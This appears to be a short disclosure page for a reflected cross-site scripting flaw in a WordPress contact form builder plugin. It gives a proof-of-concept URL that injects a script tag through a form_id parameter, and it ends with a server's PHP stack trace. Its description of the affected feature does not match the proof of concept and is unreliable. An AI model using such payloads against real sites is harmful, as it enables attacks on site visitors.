1. Description:
This plugin creates a Contact Form Builder from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
http://localhost/code_generator.php?form_id=<script>alert('xss')</script>
Wordpress plugin contact form builder 1.6.1 crosssite scripting (xss)
Fatal error: Uncaught mysqli_sql_exception: Too many connections in /var/www/html/_dbconfig.inc.php:45
Stack trace:
#0 /var/www/html/_dbconfig.inc.php(45): mysqli->__construct()
#1 /var/www/html/_footer.inc.php(2): require('...')
#2 /var/www/html/security/exploits-vulnerability/vuln.php(218): require('...')
#3 {main}
thrown in /var/www/html/_dbconfig.inc.php on line 45